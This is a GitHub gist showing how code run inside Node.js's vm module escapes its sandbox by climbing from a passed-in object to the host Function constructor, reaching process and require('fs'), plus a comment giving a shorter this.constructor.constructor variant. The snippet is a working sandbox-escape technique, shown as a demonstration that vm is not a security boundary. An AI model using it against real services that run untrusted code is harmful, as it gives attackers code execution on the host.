Skip to content

Instantly share code, notes, and snippets.

@domenic
Created August 17, 2015 20:20
Show Gist options
  • Save domenic/d15dfd8f06ae5d1109b0 to your computer and use it in GitHub Desktop.
Save domenic/d15dfd8f06ae5d1109b0 to your computer and use it in GitHub Desktop.
Escaping the vm sandbox
"use strict";
const vm = require("vm");
const sandbox = { anObject: {} };
const whatIsThis = vm.runInNewContext(`
const ForeignObject = anObject.constructor;
const ForeignFunction = ForeignObject.constructor;
const process = ForeignFunction("return process")();
const require = process.mainModule.require;
require("fs");
`, sandbox);
@NiXXeD
Copy link

NiXXeD commented May 13, 2016

Technically you can also just do:
const ForeignFunction = this.constructor.constructor;
since the context object itself is created in the context you want. You don't even need a foreign object.

Also, this still appears to be an issue in Node 6.1.0. Just tested this for a silly Hubot script we have.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment